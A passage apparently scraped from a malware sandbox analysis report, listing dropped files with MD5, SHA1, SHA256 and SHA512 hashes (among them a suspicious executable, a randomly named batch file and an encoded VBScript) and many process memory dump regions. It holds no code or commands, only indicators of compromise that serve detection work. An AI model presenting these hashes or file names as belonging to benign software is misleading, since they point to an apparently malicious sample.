d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
9e97fb2695d962c6323739e02ad343b8

SHA1
f8678637e6e0b049990515fe5b86d7e1c899c64c

SHA256
aa28ac9b1e05ad85bc79a9a75157240ac15b9c16d6e66404b981a299cfcfa6e2

SHA512
373a98b305140a42e99e7f5c0862ef83dd1b2d2546b6d9e64dfa82bb0efc8609f4a36b8cb9e0f52be8b4e76ee4a23586a8042a67eb888285a8045dcbd1f0baaf

Download Submit
C:\containerServerWebMonitornet\ContainerServersvc.exe
Filesize
2.9MB

MD5
65efaa0969029562f7e4c666a369b293

SHA1
0c6f5f51e62e70ac9ce16bb60bedc45be704e0ce

SHA256
8d4b80063a77a08f7bc7a27ddd8758b3ab5fcfce2fba97f501516f2f2acb216a

SHA512
c5f4b40b831c3b3056fcd9ae7d25075614196388d5fbe1ff5e32cb032085fedf999d91ed2e53fd6d25e51a349d44496b29f4e73f2c16a429209d9dad556603eb

Download Submit
C:\containerServerWebMonitornet\ContainerServersvc.exe
Filesize
2.9MB

MD5
65efaa0969029562f7e4c666a369b293

SHA1
0c6f5f51e62e70ac9ce16bb60bedc45be704e0ce

SHA256
8d4b80063a77a08f7bc7a27ddd8758b3ab5fcfce2fba97f501516f2f2acb216a

SHA512
c5f4b40b831c3b3056fcd9ae7d25075614196388d5fbe1ff5e32cb032085fedf999d91ed2e53fd6d25e51a349d44496b29f4e73f2c16a429209d9dad556603eb

Download Submit
C:\containerServerWebMonitornet\SHgR50yPdqOmq945QS.bat
Filesize
56B

MD5
48dc8686c62b7b927e36bf74a98a9498

SHA1
1b5f633e8ee8296e86f66fa700c731054daa1d39

SHA256
26f41248865bd414e0e0242e0ca588bf2637217c29ad2409d9f47e41ac0471de

SHA512
afdb6aeb201a95e79e16fa80a97437657c474c3b755de358ede585a244a642520f4cedbdd63d58de63718886542e690ea86eedea6e5fb9ec1c2f800847770b25

Download Submit
C:\containerServerWebMonitornet\qcbaWttH43WmPxKkpx5bHkWC.vbe
Filesize
223B

MD5
6b048d7db1fc8755805ba0516caaff08

SHA1
1b9b638f2ac742c63c181881edf52c4ab3e26d06

SHA256
54284cb2c34ef39686b46c5977cd56a4b3c842a7913821beb737572e8139ac53

SHA512
bf44eff1ef4cdd79416237a5f76700ea95887b8a5274b41346c3abde451142edf9cb1d6e85c645361fe738a331615923fc30d28c623827cb63fa0bae983ff95f

Download Submit
memory/116-143-0x0000000000000000-mapping.dmp

Download
memory/316-185-0x0000000000000000-mapping.dmp

Download
memory/528-282-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/528-250-0x0000000000000000-mapping.dmp

Download
memory/528-273-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/556-218-0x0000000000000000-mapping.dmp

Download
memory/748-181-0x0000000000000000-mapping.dmp

Download
memory/1056-197-0x0000000000000000-mapping.dmp

Download
memory/1076-227-0x0000000000000000-mapping.dmp

Download
memory/1104-187-0x0000000000000000-mapping.dmp

Download
memory/1132-246-0x0000000000000000-mapping.dmp

Download
memory/1132-257-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/1256-146-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/1256-144-0x0000000000000000-mapping.dmp

Download
memory/1256-148-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/1408-214-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/1420-209-0x0000000000000000-mapping.dmp

Download
memory/1504-194-0x0000000000000000-mapping.dmp

Download
memory/1532-189-0x0000000000000000-mapping.dmp

Download
memory/1976-226-0x0000000000000000-mapping.dmp

Download
memory/2076-224-0x0000000000000000-mapping.dmp

Download
memory/2304-173-0x0000000005810000-0x000000000591A000-memory.dmp

Filesize
1.0MB

Download
memory/2304-231-0x0000000006E90000-0x0000000006F22000-memory.dmp

Filesize
584KB

Download
memory/2304-163-0x0000000000B80000-0x0000000000B9E000-memory.dmp

Filesize
120KB

Download
memory/2304-166-0x0000000005BE0000-0x00000000061F8000-memory.dmp

Filesize
6.1MB

Download
memory/2304-236-0x00000000071C0000-0x00000000071DE000-memory.dmp

Filesize
120KB

Download
memory/2304-235-0x0000000007CD0000-0x0000000008274000-memory.dmp

Filesize
5.6MB

Download
memory/2304-232-0x0000000006F30000-0x0000000006FA6000-memory.dmp

Filesize
472KB

Download
memory/2304-205-0x0000000006A80000-0x0000000006AE6000-memory.dmp

Filesize
408KB

Download
memory/2304-154-0x0000000000000000-mapping.dmp

Download
memory/2304-201-0x0000000006AF0000-0x0000000006CB2000-memory.dmp

Filesize
1.8MB

Download
memory/2304-202-0x00000000071F0000-0x000000000771C000-memory.dmp

Filesize
5.2MB

Download
memory/2304-169-0x0000000005560000-0x000000000559C000-memory.dmp

Filesize
240KB

Download
memory/2304-167-0x0000000005500000-0x0000000005512000-memory.dmp

Filesize
72KB

Download
memory/2332-283-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2332-255-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2332-243-0x0000000000000000-mapping.dmp

Download
memory/2344-207-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2344-160-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2344-151-0x0000000000000000-mapping.dmp

Download
memory/2344-155-0x0000000000130000-0x000000000057A000-memory.dmp

Filesize
4.3MB

Download
memory/2368-216-0x0000000000000000-mapping.dmp

Download
memory/2484-272-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2484-147-0x0000000000000000-mapping.dmp

Download
memory/2484-245-0x0000000000000000-mapping.dmp

Download
memory/2568-184-0x0000000000000000-mapping.dmp

Download
memory/2672-248-0x0000000000000000-mapping.dmp

Download
memory/2672-265-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2704-170-0x0000000000000000-mapping.dmp

Download
memory/2736-138-0x0000000000000000-mapping.dmp

Download
memory/2736-145-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2736-159-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2760-276-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2760-238-0x0000000000000000-mapping.dmp

Download
memory/2760-251-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2816-254-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2816-240-0x0000000000000000-mapping.dmp

Download
memory/2816-284-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2828-258-0x0000000000000000-mapping.dmp

Download
memory/2828-269-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/2828-262-0x0000000000C40000-0x0000000000F2C000-memory.dmp

Filesize
2.9MB

Download
memory/2836-217-0x0000000000000000-mapping.dmp

Download
memory/2856-198-0x0000000000000000-mapping.dmp

Download
memory/3372-193-0x0000000000000000-mapping.dmp

Download
memory/3372-222-0x0000000000000000-mapping.dmp

Download
memory/3388-164-0x0000000000000000-mapping.dmp

Download
memory/3388-171-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/3388-168-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/3496-219-0x0000000000000000-mapping.dmp

Download
memory/3508-204-0x0000000000000000-mapping.dmp

Download
memory/3552-256-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/3552-244-0x0000000000000000-mapping.dmp

Download
memory/3564-223-0x0000000000000000-mapping.dmp

Download
memory/3568-261-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/3568-247-0x0000000000000000-mapping.dmp

Download
memory/3572-210-0x0000000000000000-mapping.dmp

Download
memory/3684-206-0x0000000000000000-mapping.dmp

Download
memory/3776-270-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/3776-241-0x0000000000000000-mapping.dmp

Download
memory/3784-253-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/3784-239-0x0000000000000000-mapping.dmp

Download
memory/3784-196-0x0000000000000000-mapping.dmp

Download
memory/3784-274-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/3836-141-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/3836-134-0x0000000000000000-mapping.dmp

Download
memory/3836-136-0x00000207CCBA0000-0x00000207CCBC2000-memory.dmp

Filesize
136KB

Download
memory/3836-139-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/3884-242-0x0000000000000000-mapping.dmp

Download
memory/3884-271-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/4020-263-0x000000001D840000-0x000000001D844000-memory.dmp

Filesize
16KB

Download
memory/4020-180-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/4020-264-0x000000001B659000-0x000000001B65F000-memory.dmp

Filesize
24KB

Download
memory/4020-233-0x000000001D840000-0x000000001D844000-memory.dmp

Filesize
16KB

Download
memory/4020-176-0x0000000000000000-mapping.dmp

Download
memory/4020-266-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/4020-267-0x000000001D844000-0x000000001D847000-memory.dmp

Filesize
12KB

Download
memory/4020-215-0x000000001B659000-0x000000001B65F000-memory.dmp

Filesize
24KB

Download
memory/4020-179-0x0000000000760000-0x0000000000A4C000-memory.dmp

Filesize
2.9MB

Download
memory/4020-268-0x000000001D847000-0x000000001D84C000-memory.dmp

Filesize
20KB

Download
memory/4020-195-0x000000001D010000-0x000000001D538000-memory.dmp

Filesize
5.2MB

Download
memory/4020-234-0x000000001D844000-0x000000001D847000-memory.dmp

Filesize
12KB

Download
memory/4020-191-0x000000001B570000-0x000000001B5C0000-memory.dmp

Filesize
320KB

Download
memory/4140-199-0x0000000000000000-mapping.dmp

Download
memory/4188-149-0x0000000000000000-mapping.dmp

Download
memory/4220-208-0x0000000000000000-mapping.dmp

Download
memory/4328-237-0x0000000000000000-mapping.dmp

Download
memory/4328-277-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/4328-249-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/4344-175-0x0000000000000000-mapping.dmp

Download
memory/4628-221-0x0000000000000000-mapping.dmp

Download
memory/4684-220-0x0000000000000000-mapping.dmp

Download
memory/4712-230-0x0000017B43910000-0x0000017B4392C000-memory.dmp

Filesize
112KB

Download
memory/4712-225-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/4712-228-0x0000017B436C0000-0x0000017B436DC000-memory.dmp

Filesize
112KB

Download
memory/4712-229-0x0000017B437A0000-0x0000017B437AA000-memory.dmp

Filesize
40KB

Download
memory/4712-213-0x0000000000000000-mapping.dmp

Download
memory/4716-186-0x0000000000000000-mapping.dmp

Download
memory/4724-329-0x0000000000D00000-0x0000000000D20000-memory.dmp

Filesize
128KB

Download
memory/4780-200-0x0000000000000000-mapping.dmp

Download
memory/4884-203-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/4884-192-0x00007FF8A95B0000-0x00007FF8AA071000-memory.dmp

Filesize
10.8MB

Download
memory/4884-183-0x0000000000000000-mapping.dmp

Download
memory/4932-132-0x0000000000000000-mapping.dmp

Download
memory/4940-133-0x0000000000000000-mapping.dmp

Download
memory/5044-190-0x0000000000000000-mapping.dmp

Download
memory/5056-182-0x0000000000000000-mapping.dmp

Download
memory/5072-140-0x0000000000000000-mapping.dmp

Download
memory/5920-303-0x0000000000000000-mapping.dmp

Download
memory/5948-304-0x0000000000000000-mapping.dmp

Download